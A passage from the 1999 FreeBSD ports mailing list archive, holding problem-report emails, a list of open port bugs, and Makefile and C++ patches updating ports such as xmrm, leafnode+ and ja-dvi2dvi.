-9,7 +9,7 @@ DISTNAME= kdbg-1.0.1 CATEGORIES= devel kde MASTER_SITES= http://members.telecom.at/~johsixt/ \ - ftp://eudaptics.co.at/pub/people/jsixt/ + ftp://ftp.eudaptics.co.at/pub/people/jsixt/ MAINTAINER= jedgar@fxp.org >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 10:10: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 50B6114D96 for ; Mon, 29 Nov 1999 10:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA31228; Mon, 29 Nov 1999 10:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 10:10:02 -0800 (PST) Message-Id: <199911291810.KAA31228@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Alec Wolman" Subject: Re: ports/15153: bugfix for the p5-Mysql port Reply-To: "Alec Wolman" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15153; it has been noted by GNATS. From: "Alec Wolman" To: "Chris D. Faulhaber" Cc: freebsd-gnats-submit@freebsd.org Subject: Re: ports/15153: bugfix for the p5-Mysql port Date: Mon, 29 Nov 1999 10:05:18 -0800 > Personally I'd rather just add the following: > > RUN_DEPENDS= ${BUILD_DEPENDS} > > which tends to be a bit cleaner than rewriting the dependencies again. Fine w/me. Alec To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 11: 0:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 67C241529C for ; Mon, 29 Nov 1999 11:00:10 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA35932 for freebsd-ports@freebsd.org; Mon, 29 Nov 1999 11:00:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 29 Nov 1999 11:00:09 -0800 (PST) Message-Id: <199911291900.LAA35932@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD ports list Subject: Current unassigned ports problem reports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/11/03] ports/14696 ports New port: wmGrabImage o [1999/11/13] ports/14862 ports [update] X-TT 1.2 -> 1.3 o [1999/11/14] ports/14885 ports ports/net/pipsecd build fails o [1999/11/14] ports/14888 ports ports/security/bjorb build fails o [1999/11/16] ports/14926 ports JBIG-KIT port upgraded to the version 1.1 o [1999/11/17] ports/14944 ports No stable Gimp in ports o [1999/11/18] ports/14987 ports graphics/xpm does not build a dynamic lib o [1999/11/24] ports/15085 ports fixing-upgrading the editors/xenon port o [1999/11/26] ports/15100 ports new port links-0.80 o [1999/11/26] ports/15107 ports Patch for FreeBSD s/key support in OpenSS o [1999/11/27] ports/15120 ports [PATCH] mail/pine4 pgp support does not h o [1999/11/27] ports/15123 ports www/apache13-modssl has PREFIX problems f o [1999/11/28] ports/15137 ports [PATCH] www/lynx-ssl can't find OpenSSL i o [1999/11/28] ports/15157 ports [PATCH] Environment Botch in KDM o [1999/11/29] ports/15161 ports Add pnmtopng run-time dependency to a tgi 17 problems total. Non-critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1998/09/19] ports/7992 ports New port: xemacs20-stepwise (XEmacs20 hac a [1998/11/25] ports/8864 ports useradd - system V compatible implementat o [1999/02/07] ports/9954 ports New port: devel/ACE o [1999/02/10] ports/10007 ports Port of the mercury compiler version 0.8 o [1999/02/16] ports/10124 ports UNIX|STAT pr submission failed to include o [1999/03/07] ports/10477 ports The fakemail in lib-src fails to link (ne o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/26] ports/10813 ports crossgo32 brokeness f [1999/03/28] ports/10844 ports New port: adagdb o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/31] ports/13514 ports another TCL interface to MySQL port o [1999/09/05] ports/13583 ports New port: databases/py-MySQL o [1999/09/07] ports/13614 ports xdm and wdm do not set environment variab o [1999/09/07] ports/13633 ports Better location for samba's private direc o [1999/09/09] ports/13677 ports Misc. Ports fix ups. o [1999/09/18] ports/13808 ports linux-rvplayer port improved a'la netscap o [1999/09/26] ports/13986 ports New port: sysutils/gnometoaster o [1999/09/30] ports/14052 ports fvwm95-i18n - missing dependence to fbsd- o [1999/09/30] ports/14070 ports g2c libraries and compatibility for DJGPP o [1999/10/01] ports/14077 ports Multicast not available on multicast enab o [1999/10/01] ports/14079 ports ssh2 port won't install if automake is in o [1999/10/02] ports/14088 ports port of new fvwm 2.3 beta (2.3.8) o [1999/10/07] ports/14185 ports ports/x11-wm/fvwm2 updated from 2.2.2 to o [1999/10/08] ports/14209 ports Update port: graphics/giflib to libungif- o [1999/10/11] ports/14260 ports New port: WODA - A Web Oriented Database o [1999/10/14] ports/14337 ports xdm and Eterm: tty allocation problem? o [1999/10/15] ports/14359 ports Update port: mail/imap-uw o [1999/10/17] ports/14378 ports New port: graphics/mpeg o [1999/10/17] ports/14379 ports New port: graphics/xmrm o [1999/10/17] ports/14381 ports New port: games/x3eyes o [1999/10/23] ports/14469 ports remove port: deskutils/recycler o [1999/10/23] ports/14471 ports remove port: deskutils/xcalendar o [1999/10/23] ports/14478 ports status on port devel/gaa - feedback pleas o [1999/10/25] ports/14515 ports New Tripwire 1.3 Port o [1999/10/27] ports/14554 ports new port: qrash o [1999/10/30] ports/14618 ports New port: security/librc4 o [1999/10/30] ports/14619 ports New port: security/libsasl o [1999/10/31] ports/14633 ports vflib upgrade: 2.24.1->2.24.2 o [1999/11/01] ports/14643 ports A Chinese/English dictionary o [1999/11/01] ports/14644 ports A Big5-localized & XIM-enabled XEmacs por o [1999/11/02] ports/14663 ports aspell-.27.2 port doesn't read dictionari o [1999/11/03] ports/14686 ports New port: pisces IIB (Category: cad) o [1999/11/03] ports/14701 ports New Port o [1999/11/04] ports/14705 ports [NEW PORTS] ports of xls2xml converter an o [1999/11/04] ports/14716 ports This is a port of a Swedish dictionary to o [1999/11/06] ports/14741 ports A summary of the old ispell-language-file o [1999/11/06] ports/14743 ports tcl/e package install hangs sysinstall wi o [1999/11/06] ports/14744 ports tksetathome hangs sysinstall due to lack o [1999/11/06] ports/14745 ports local package fails to install o [1999/11/07] ports/14759 ports Many minor port clean-ups o [1999/11/07] ports/14761 ports More minor port clean-ups o [1999/11/07] ports/14771 ports sslwrap - a new port o [1999/11/08] ports/14783 ports mgetty 1.1.12 always sets clocal o [1999/11/12] ports/14855 ports [NEW PORT] hns (Hyper NIKKI System) f [1999/11/13] ports/14859 ports OpenSSH has no support for the login clas o [1999/11/13] ports/14866 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/11/14] ports/14869 ports New FreeBSD port for jesred-1.2.pl1 o [1999/11/14] ports/14870 ports port submission: lc-1.0 o [1999/11/14] ports/14871 ports Updates: audio/timidity++-motif o [1999/11/14] ports/14872 ports Updates: japanese/tkdesk o [1999/11/14] ports/14874 ports Eterm 0.8.10 was released o [1999/11/14] ports/14879 ports New port: lang/starlogo o [1999/11/14] ports/14889 ports [PATCH] dynamic loading for WINE port o [1999/11/14] ports/14894 ports comm/kermit some fixed patch o [1999/11/15] ports/14899 ports New Port: /editors/staroffice51a o [1999/11/15] ports/14906 ports Update devel/glade to 0.5.5 o [1999/11/15] ports/14915 ports Update port: net/generic-nqs o [1999/11/16] ports/14922 ports Want to contribute new package/port o [1999/11/17] ports/14945 ports [NEW PORT] gtkdiff - the diff(1) front-en o [1999/11/17] ports/14956 ports new port: www/screem o [1999/11/17] ports/14957 ports gtk12 requires Cronyx fonts for Russian l o [1999/11/17] ports/14963 ports update for current sox port to include GS o [1999/11/17] ports/14971 ports mkcmd-8.10 port submission o [1999/11/17] ports/14972 ports msrc0-0.6 port submission o [1999/11/18] ports/14986 ports possible bug in ssh1 o [1999/11/18] ports/14991 ports Tcl Data transformations (Tcl-Trf) port o [1999/11/19] ports/14994 ports [ports upgrade] chinese/pine4 from 4.20 t o [1999/11/21] ports/15016 ports New Port: lang/yabasic o [1999/11/21] ports/15021 ports some port installs fail for non-root user o [1999/11/21] ports/15024 ports new port: sysutils/detach o [1999/11/21] ports/15027 ports libmcrypt's distfiles should be updated o [1999/11/21] ports/15030 ports New patch, i3dren o [1999/11/21] ports/15031 ports new port editors/auctex o [1999/11/23] ports/15064 ports New port submittal o [1999/11/24] ports/15082 ports Kvidtune is missing moc location. It won' o [1999/11/25] ports/15093 ports ass man pages to net/dnsutl o [1999/11/25] ports/15094 ports Updated port to ftp/downloader to version o [1999/11/25] ports/15096 ports Update port: www/thttpd o [1999/11/26] ports/15098 ports update port: japanese/texinfo o [1999/11/26] ports/15102 ports pgp5 port is broken under -CURRENT o [1999/11/26] ports/15108 ports The print/latex port is thrashing the dis o [1999/11/27] ports/15118 ports wine-991114 once more o [1999/11/27] ports/15122 ports Update math/gnumeric to 0.44 o [1999/11/27] ports/15124 ports Update port: security/portsentry o [1999/11/27] ports/15126 ports New port: databases/pxtools o [1999/11/27] misc/15128 ports Php4 beta 3 o [1999/11/27] ports/15130 ports update port: www/hypermail o [1999/11/28] ports/15131 ports new port: devel/kpp o [1999/11/28] ports/15133 ports new port: x11/wmanager o [1999/11/28] ports/15134 ports new port: www/kdreamsite o [1999/11/28] ports/15135 ports new port: devel/cervisia o [1999/11/28] ports/15138 ports New port: deskutils/yank o [1999/11/28] ports/15141 ports update games/gracer to 0.1.4 o [1999/11/28] ports/15142 ports Added DIST_SUBDIR to print/tex port o [1999/11/28] ports/15143 ports update to freetds port (new release) o [1999/11/28] ports/15144 ports New port for hevea o [1999/11/28] ports/15145 ports emulator/vgb port with incomplete PLIST o [1999/11/28] ports/15146 ports New port submition emulator/truereality, o [1999/11/28] ports/15147 ports New port: audio/xsidplay o [1999/11/28] ports/15148 ports Update port: graphics/gimp1-i18n o [1999/11/28] ports/15152 ports new port cd-console o [1999/11/28] ports/15153 ports bugfix for the p5-Mysql port o [1999/11/28] ports/15154 ports update the p5-SQL-Statement port to versi o [1999/11/28] ports/15155 ports update of p5-ReadLine-Perl to version 0.9 o [1999/11/28] ports/15156 ports update of p5-URI to version 1.04 o [1999/11/28] ports/15159 ports new port: games/blackpenguin o [1999/11/28] ports/15160 ports new port: games/ksnes9x o [1999/11/29] ports/15163 ports Update ports: xemacs-mule-packages-1.0(ed o [1999/11/29] ports/15165 ports Update port: games/krubik o [1999/11/29] ports/15166 ports update udmsearch port to 2.2.1 o [1999/11/29] ports/15167 ports Update port: devel/kdbg 153 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 11: 1: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.HiWAAY.net (fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (Postfix) with ESMTP id E82E71579B for ; Mon, 29 Nov 1999 11:01:00 -0800 (PST) (envelope-from sprice@hiwaay.net) Received: from localhost (sprice@localhost) by mail.HiWAAY.net (8.9.3/8.9.0) with ESMTP id NAA12839; Mon, 29 Nov 1999 13:00:54 -0600 (CST) Date: Mon, 29 Nov 1999 13:00:53 -0600 (CST) From: Steve Price To: Bill Fenner Cc: mi@aldan.algebra.com, ports@FreeBSD.ORG Subject: Re: bug in russian/koi8r-ps In-Reply-To: <199911291648.LAA14869@windsor.research.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That would be my fault. I just corrected it. On Mon, 29 Nov 1999, Bill Fenner wrote: # It looks like ${AWK} isn't defined when make evaluates the != . # The easy fix is to turn it into "awk" instead of "${AWK}", I don't # know what the right fix is. # # Bill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 13:10: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D0431519F for ; Mon, 29 Nov 1999 13:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA47572; Mon, 29 Nov 1999 13:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Mon, 29 Nov 1999 13:10:02 -0800 (PST) Message-Id: <199911292110.NAA47572@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Tobias Reifenberger Subject: Re: ports/14379: New port: graphics/xmrm Reply-To: Tobias Reifenberger Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/14379; it has been noted by GNATS. From: Tobias Reifenberger To: freebsd-gnats-submit@freebsd.org, treif@mayn.de Cc: Subject: Re: ports/14379: New port: graphics/xmrm Date: Mon, 29 Nov 1999 22:02:51 +0100 This is a multi-part message in MIME format. --------------605FA9C351C2BB6CFF45BEAD Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Hi GCC 2.95.2 broke the port. Attached are the new versions of two patch-files - please use these when you test the port. bye -- Tobias Reifenberger -- treif@mayn.de -- DG1NGT GEE e* dpu s:- a-- C+++ UB+++ L- W+ N+ w--- Y+ tv+ b++ D++ h++ r--- --------------605FA9C351C2BB6CFF45BEAD Content-Type: text/plain; charset=us-ascii; name="patch-ac" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="patch-ac" --- ../xmrm.orig/io.h Tue Mar 10 00:00:00 1998 +++ io.h Sat Nov 27 00:33:23 1999 @@ -39,7 +39,7 @@ char *URL_CG_Home; char *URL_TU_Vienna; - ControlClass(); + void ControlClassInit(); int GetDraw(); void SetDraw(int d); void SetCursor(int Active, Window win); --- ../xmrm.orig/io.cc Tue Mar 10 00:00:00 1998 +++ io.cc Sat Nov 27 00:55:37 1999 @@ -87,7 +87,7 @@ extern ControlClass control; /* Constructor: */ -ControlClass::ControlClass() +void ControlClass::ControlClassInit() { int i; @@ -1720,7 +1720,7 @@ // extension--; i=0; - number = ".000."; + strcpy(number , ".000."); while ( !(extension = strstr(extension,number)) && i<=999 ) { i++; --- ../xmrm.orig/xmrm_main.cc Tue Mar 10 00:00:00 1998 +++ xmrm_main.cc Sat Nov 27 00:31:24 1999 @@ -6,7 +6,6 @@ #include #include #include -#include //**************** #include "xmrm.h" #include "io.h" #include "const.h" @@ -308,7 +307,7 @@ control.debug = 0; /* Init control: */ - control.ControlClass(); // call constructor + control.ControlClassInit(); // call constructor temp = control.URL_manual; while( (c=getopt(argc, argv, "hdm:p:")) != -1) --- ../xmrm.orig/xmrm_mpeg_main.cc Tue Mar 10 00:00:00 1998 +++ xmrm_mpeg_main.cc Sat Nov 27 00:54:15 1999 @@ -68,7 +68,7 @@ { int count = 0; - backup_class->number_str = ".000."; + strcpy(backup_class->number_str , ".000."); while ( !(*ext = strstr(fname_only,backup_class->number_str)) && (count <= MAX_PIC_NUM) ) { @@ -417,7 +417,7 @@ // Check for even picture size if ( (tif_w % 2) || (tif_h % 2) ) { - work_class->even = ".even"; + strcpy(work_class->even , ".even"); if ( Even_Size( tif, tif_w, tif_h) ) return 1; } --------------605FA9C351C2BB6CFF45BEAD Content-Type: text/plain; charset=us-ascii; name="patch-ad" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="patch-ad" --- ../xmrm.orig/morphvec.cc Tue Mar 10 00:00:00 1998 +++ morphvec.cc Sat Nov 27 00:44:30 1999 @@ -9,6 +9,7 @@ #include "io.h" #include "xmrm.h" //#include "areas.h" +#include //static int oneliner = 1; @@ -17,7 +18,7 @@ extern Display *disp; -extern max_x,max_y; +extern int max_x,max_y; extern ControlClass control; extern VisualInfoClass vis; extern WindowClass *s_win, *d_win; @@ -433,6 +434,10 @@ void MorphVecClass::DrawVectorScal(FL_OBJECT *obj, int item, int mode, FL_COLOR col) { double sc_x,sc_y; + + /* don't exit on FPE */ + fpsetmask(0); + sc_x = (double) obj->w / max_x; sc_y = (double) obj->h / max_y; if (item > nr_vec) --------------605FA9C351C2BB6CFF45BEAD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 13:40: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0279115406 for ; Mon, 29 Nov 1999 13:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA50646; Mon, 29 Nov 1999 13:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from finch-post-1.mail.in2home.net (finch-post-1.mail.in2home.net [212.225.36.83]) by hub.freebsd.org (Postfix) with ESMTP id 4274B14FDF for ; Mon, 29 Nov 1999 13:36:44 -0800 (PST) (envelope-from tom@eborcom.com) Received: from host-74-160.dial.in2home.co.uk ([212.225.19.160]) by finch-post-1.mail.in2home.net with esmtp (Exim 2.12 #1) id 11sYTS-000M9A-01 for FreeBSD-gnats-submit@freebsd.org; Mon, 29 Nov 1999 21:36:43 +0000 Received: (qmail 1024 invoked by uid 5000); 29 Nov 1999 21:33:34 -0000 Message-Id: <19991129213333.1023.qmail@eborcom.com> Date: 29 Nov 1999 21:33:33 -0000 From: tom@FreeBSD.org Reply-To: tom@FreeBSD.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15170: Update Port: leafnode+ Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15170 >Category: ports >Synopsis: Update Port: leafnode+ >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 13:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tom Hukins >Release: FreeBSD 2.2.8-STABLE i386 >Organization: >Environment: >Description: The following patch updates the leafnode+ port. I am the port's maintainer. No files have been added/removed to/from the port. >How-To-Repeat: >Fix: diff -ruN leafnode+.old/Makefile leafnode+/Makefile --- leafnode+.old/Makefile Tue Sep 28 21:51:58 1999 +++ leafnode+/Makefile Mon Nov 29 21:21:56 1999 @@ -1,12 +1,12 @@ # New ports collection makefile for: leafnode+ -# Version required: 2.8 +# Version required: 2.9 # Date created: 19 November 1998 # Whom: Tom Hukins # # $FreeBSD: ports/news/leafnode+/Makefile,v 1.11 1999/09/26 18:44:14 dan Exp $ # -DISTNAME= leafnode+-2.8 +DISTNAME= leafnode+-2.9 CATEGORIES= news MASTER_SITES= ftp://ftp.big.or.jp/pub/usr2/jam/leafnode/ diff -ruN leafnode+.old/files/md5 leafnode+/files/md5 --- leafnode+.old/files/md5 Tue Sep 28 21:51:58 1999 +++ leafnode+/files/md5 Mon Nov 29 21:22:14 1999 @@ -1 +1 @@ -MD5 (leafnode+-2.8.tar.gz) = aed4be6f1152fb48ba5999ce2cd0ab93 +MD5 (leafnode+-2.9.tar.gz) = 1a1239c9797b7f637ddda3d4d0572d40 diff -ruN leafnode+.old/patches/patch-aa leafnode+/patches/patch-aa --- leafnode+.old/patches/patch-aa Tue Sep 28 21:51:58 1999 +++ leafnode+/patches/patch-aa Mon Nov 29 21:23:27 1999 @@ -10,7 +10,7 @@ -PREFIX = /usr/local BINDIR = $(PREFIX)/sbin -MANDIR = $(PREFIX)/man - VERSION = 2.8 + VERSION = 2.9 # # if you want to use Socks, use following. @@ -29,11 +25,11 @@ diff -ruN leafnode+.old/pkg/DESCR leafnode+/pkg/DESCR --- leafnode+.old/pkg/DESCR Sat Jul 10 14:11:21 1999 +++ leafnode+/pkg/DESCR Mon Nov 29 21:32:02 1999 @@ -12,4 +12,4 @@ (typically PREFIX/lib/leafnode and /var/spool/leafnode) are setup automatically. -WWW: http://www.io.com/~kazushi/freeware/leafnode+.html +WWW: http://www.io.com/~kazushi/leafnode+/ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Mon Nov 29 14:20: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 05D1815466 for ; Mon, 29 Nov 1999 14:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA54326; Mon, 29 Nov 1999 14:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 5CDD91548A; Mon, 29 Nov 1999 14:19:30 -0800 (PST) Message-Id: <19991129221930.5CDD91548A@hub.freebsd.org> Date: Mon, 29 Nov 1999 14:19:30 -0800 (PST) From: watanabe@zlab.phys.nagoya-u.ac.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15171: Updated port: ja-dvi2dvi (japanese/dvi2dvi) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15171 >Category: ports >Synopsis: Updated port: ja-dvi2dvi (japanese/dvi2dvi) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Mon Nov 29 14:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Makoto WATANABE >Release: FreeBSD 3.2-RELEASE i386 >Organization: Z lab. Division of Particle and Astrophysical Science, Nagoya University, JAPAN >Environment: >Description: I have updated the 'ja-dvi2dvi' ports. (1.0 -> 1.1) I put the patch below "Fix:" Changed files are dvi2dvi/Makefile dvi2dvi/files/md5 dvi2dvi/files/fontdesc dvi2dvi/patches/patch-aa dvi2dvi/patches/patch-ab dvi2dvi/patches/patch-ac dvi2dvi/patches/patch-ad dvi2dvi/patches/patch-ae dvi2dvi/patches/patch-af dvi2dvi/pkg/PLIST - Makoto WATANABE watanabe@zlab.phys.nagoya-u.ac.jp >How-To-Repeat: >Fix: diff -ruN dvi2dvi.orig/Makefile dvi2dvi/Makefile --- dvi2dvi.orig/Makefile Wed Aug 25 21:17:26 1999 +++ dvi2dvi/Makefile Tue Nov 30 04:46:49 1999 @@ -1,33 +1,48 @@ # New ports collection makefile for: dvi2dvi -# Version required: 1.0 +# Version required: 1.1 # Date created: 25 Dec 1997 # Whom: Makoto WATANABE # # $FreeBSD: ports/japanese/dvi2dvi/Makefile,v 1.2 1999/08/25 05:23:43 obrien Exp $ # -DISTNAME= dvi2dvi-1.0 -PKGNAME= ja-dvi2dvi-1.0 +DISTNAME= dvi2dvi-1.1 +PKGNAME= ja-dvi2dvi-1.1 CATEGORIES= japanese print -MASTER_SITES= ftp://ftp.math.s.chiba-u.ac.jp/tex/ +MASTER_SITES= ftp://ftp.math.s.chiba-u.ac.jp/tex/ \ + ftp://ftp.math.s.chiba-u.ac.jp/tex/tex/ +DISTFILES= ${DISTNAME}${EXTRACT_SUFX} web2c-7.2a${EXTRACT_SUFX} MAINTAINER= watanabe@zlab.phys.nagoya-u.ac.jp RUN_DEPENDS= ${PREFIX}/share/fonts/vf-n2a:${PORTSDIR}/japanese/vftool +USE_GMAKE= yes +MAKE_ENV+= kpathsea_parent=../${KPATHSEA_PARENT} + +KPATHSEA_PARENT= web2c-7.2 + post-extract: @( cd ${WRKSRC} ; ${MAKE} newlib ) @${CP} ${FILESDIR}/fontdesc ${WRKSRC}/lib -post-patch: -.for i in config p2n +pre-configure: + @( cd ${WRKDIR}/${KPATHSEA_PARENT}/kpathsea ; \ + ./configure --prefix=${PREFIX} ) + +pre-build: + @( cd ${WRKDIR}/${KPATHSEA_PARENT}/kpathsea ; ${GMAKE} ) + +pre-install: +.for i in config configk fonts/p2n fontsk/p2n @${CP} ${WRKSRC}/lib/$i ${WRKSRC}/lib/$i.orig @${SED} -e 's,@PREFIX@,${PREFIX},g' \ ${WRKSRC}/lib/$i.orig > ${WRKSRC}/lib/$i .endfor post-install: - @${RM} ${WRKSRC}/lib/*.orig + @${RM} ${WRKSRC}/lib/*.orig \ + ${WRKSRC}/lib/fonts/*.orig ${WRKSRC}/lib/fontsk/*.orig @( cd ${WRKSRC} ; ${MAKE} PREFIX=${PREFIX} install-lib ) @${MKDIR} -m 777 ${PREFIX}/share/fonts/vf-rot .if !defined(NOPORTDOCS) diff -ruN dvi2dvi.orig/files/fontdesc dvi2dvi/files/fontdesc --- dvi2dvi.orig/files/fontdesc Tue Dec 22 00:59:00 1998 +++ dvi2dvi/files/fontdesc Tue Nov 30 04:46:49 1999 @@ -2,13 +2,12 @@ # dvi2dvi fontdesc file for FreeBSD jTeX and pTeX ports collection. # # configuration -fontdesc config +fontdesc config$kpse # # NTT dvi (subfont) -> ASCII dvi -# -# virtual font -font vf * 0 $vf/vf-n2a/%f.vf -# -# tfm used in the above vf (ASCII jfm, i.e. min10.tfm ...) -font jfm * 0 $af/tfm/ptex/%f.tfm -font jfm * 0 $nsf/jfms/%f.tfm +fontdesc fonts$kpse/n2a +# ASCII dvi -> NTT dvi (subfont) +#fontdesc fonts$kpse/a2n +# pTeX dvi -> NTT dvi (subfont) +#fontdesc fonts$kpse/p2n +#fontdesc fonts$kpse/p2pn diff -ruN dvi2dvi.orig/files/md5 dvi2dvi/files/md5 --- dvi2dvi.orig/files/md5 Tue Dec 22 00:59:00 1998 +++ dvi2dvi/files/md5 Tue Nov 30 04:46:49 1999 @@ -1 +1,2 @@ -MD5 (dvi2dvi-1.0.tar.gz) = 9018a59f80b622ec83731d5d31c58157 +MD5 (dvi2dvi-1.1.tar.gz) = 00d3c6b793e3a466301a223cc77fc1e4 +MD5 (web2c-7.2a.tar.gz) = 012c33d3862472012fb02ef1773e0627 diff -ruN dvi2dvi.orig/patches/patch-aa dvi2dvi/patches/patch-aa --- dvi2dvi.orig/patches/patch-aa Thu Feb 11 21:10:23 1999 +++ dvi2dvi/patches/patch-aa Tue Nov 30 04:46:49 1999 @@ -1,5 +1,5 @@ ---- Makefile.orig Mon May 20 05:32:43 1996 -+++ Makefile Mon Dec 21 19:31:32 1998 